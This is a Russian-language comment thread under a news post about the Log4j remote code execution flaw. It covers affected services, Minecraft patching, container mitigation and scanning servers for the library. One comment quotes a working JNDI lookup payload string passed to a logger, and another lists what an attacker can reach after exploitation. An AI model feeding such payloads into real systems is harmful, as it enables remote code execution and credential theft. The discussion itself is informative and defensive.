Pull to refresh

Comments 17

У «половины интернета» нашли выполнение произвольного кода через

Через что? Видимо, сохраняете интригу? [0]

А где в статье доказательства громкого заголовка?

  1. Что такое "половина интернета"?

  2. Где ссылки на исследования? Мало ли, что уязвимо, это не значит, что вредоносный код уже прямо сейчас исполняется на всех серверах майнкрафта.

UPD 0:

[0] заголовок был обновлён

Сори. Исправил заголовок.

Примеры по ссылки в статье. Там и CloudFlare, и Apple, и Amazon, и Steem с Твитером.

Этот вредоносный код имеется не только на всех серверах майнкрафта, а имеется и во всех клиентах майнкрафта, выпущенных до вчерашних обновлений. Вчера все майнкрафт-сообщество пыхтело над тем, чтобы убрать эту уязвимость, в частности сообщества серверов Bukkit/Spigot/Paper/Mohist, сообщества Fabric/Forge/Optifine, даже сами Mojang отработали ночную смену, чтобы как можно быстрее пофиксить это в версии 1.18.1, и как можно быстрее пропатчить все 1.12+ версии. К слову, игрокам пиратских клиентов на данный момент я бы посоветовал воздержаться от игры в майнкрафт на публичных серверах вообще, потому что данный эксплоит уже во всю пошёл в ход, а как быстро авторы пиратских лаунчеров обновят свои jar до пропатченных – большой вопрос.

Позвольте, наличие уязвимости !== выполнение вредоносного кода. Тут как с человеком, вы хоть и уязвимы к микобактерии туберкулёза, но это совершенно не значит, что вы уже заражены.

Это для случая когда кто-то написал log.debug(myStringVariable) или log.debug("myStringVariable = {}", myStringVariable) тоже под угрозой?

https://issues.apache.org/jira/browse/LOG4J2-3198?focusedCommentId=17457333&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-17457333

unfortunately the lookup is performed after formatting the message, which includes the user input. Hence the vulnerability can still be triggered using a ParametrizedMessage:

String userInput = "${jndi:ldap://127.0.0.1:1389/a}";
logger.info("foo {}", userInput)

Странно, что такая важная новость и так мало внимания.
Log4j используется большинством Java-приложений. Это логирование, то есть оно может бахнуть в любом месте, где логируются пользовательские данные, не важно как они попадают в сервис.
Выпущенный фикс не отменяет того, что десятки тысяч сервисов необходимо пересобрать и передеплоить. Мне кажется, этим будут заняты сотни организаций по всему миру в ближайшие пару месяцев.

Вспоминается та недавняя уявзимость в imagemagick. Тоже ходило в интернет куда скажут.

Почему в мануалах ещё в отдельном разделе выделенном большими красными буквами не предупреждают, что программа/библиотека будет сама лазать куда-то в интернет в таких-то и таких-то случаях?

Донесите эту идею до сообщества, пожалуйста.

У нас настолько старый софт, что он просто неуязвим :) Все еще версия 1.х используется. Да и опять же слава богу без доступа к интернету. Потому проще.

Интересно, докер-контейнеры в этом случае помогут? Что там можно такого натворить? Тем более если приложение работает с правами непривилигированного пользователя?

Можно получить доступ к внутренней сети и соответственно ко всем незащищенным ресурсам, которых в ней будет предостаточно. У самого приложения может быть конфиг\переменные окружения с паролями к каким-нибудь БД. И это только первое, что пришло в голову.

ЁПРСТ, но как, КАК? Кому вообще могло прийти в голову парсить вставляемые данные в поисках log4j-разметки? Почему нельзя было парсить только ту разметку, что пришла из конфига?

Т.е. тем, у кого нет Java на сервере, опасаться в рамках этой уязвимости нечего. Я правильно понимаю?

Ага, тем кто не пользуется log4j данная уязвимость тоже не страшна)

Как можно просканировать сервера на наличие этой библиотеки? А лучше в формате есть/нет библиотека, уязвима/пофикшена? Интересуют виндовые сервера. Уже требуют все свои ~1000 серверов прочекать... Проблема в том, что на каждом сервере софта, использующего такие библиотеки, может быть много, было бы проще найти специфичные файлы, или версии исполняемых файлов и специфичное содержимое конфигов.

Должно быть кто-то написал скриптик уже. Вот не хочется велосипед изобретать.

Only those users with full accounts are able to leave comments. Log in, please.